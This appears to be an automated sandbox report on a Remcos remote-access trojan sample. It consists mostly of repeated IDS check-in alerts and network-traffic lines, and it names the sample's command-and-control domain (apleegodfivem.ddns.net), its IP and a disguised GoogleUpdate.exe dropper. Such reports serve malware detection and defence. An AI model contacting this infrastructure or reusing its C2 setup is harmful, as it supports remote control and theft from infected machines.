Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49857 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50389 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50031 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50330 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50419 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50232 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50105 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50224 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50345 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50234 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50064 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50295 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49986 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50340 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50432 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50137 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50287 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50351 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50380 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50372 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50129 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50424 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50247 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50364 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50452 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50272 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50373 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50390 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50393 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50320 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50334 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50461 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50469 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50470 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50467 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50464 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50463 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50423 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50321 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49939 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50342 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50485 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49968 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50465 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50491 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50047 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50448 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50048 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50359 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50266 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50398 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50141 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50367 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50366 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50091 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50426 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49993 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50401 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50376 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50507 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50158 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50169 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50146 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50313 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50161 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50406 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50385 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50347 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50218 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50109 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50221 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49928 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50182 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50429 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50516 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50149 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50298 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50310 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50322 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50205 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50094 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50073 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50156 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50388 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50312 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50193 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50449 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50363 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50309 -> 198.50.242.157:443
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50416 -> 198.50.242.157:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: apleegodfivem.ddns.net
Source: Malware configuration extractor	IPs: 198.50.242.157

Uses dynamic DNS services

Source: unknown

DNS query: name: apleegodfivem.ddns.net

Source: Joe Sandbox View

ASN Name: OVHFR OVHFR

Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.242.157

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_0041936B

Source: global traffic

DNS traffic detected: DNS query: apleegodfivem.ddns.net

Source: GoogleUpdate.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: DB5rQYsfd6.exe, GoogleUpdate.exe.0.dr	String found in binary or memory: http://geoplugin.net/json.gp/C

Source: unknown	Network traffic detected: HTTP traffic on port 57084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61580 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52633 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49463 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61592 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62411 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62447 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52621 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53844
Source: unknown	Network traffic detected: HTTP traffic on port 65521 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53841
Source: unknown	Network traffic detected: HTTP traffic on port 62496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53850
Source: unknown	Network traffic detected: HTTP traffic on port 60675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53855
Source: unknown	Network traffic detected: HTTP traffic on port 62868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53852
Source: unknown	Network traffic detected: HTTP traffic on port 53910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65533 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53868
Source: unknown	Network traffic detected: HTTP traffic on port 57011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51209
Source: unknown	Network traffic detected: HTTP traffic on port 58348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53866
Source: unknown	Network traffic detected: HTTP traffic on port 65508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53865
Source: unknown	Network traffic detected: HTTP traffic on port 54851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51202
Source: unknown	Network traffic detected: HTTP traffic on port 59228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49499 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53525 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51218
Source: unknown	Network traffic detected: HTTP traffic on port 53922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53871
Source: unknown	Network traffic detected: HTTP traffic on port 58336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51214
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53874
Source: unknown	Network traffic detected: HTTP traffic on port 52212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53880
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61555 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53805
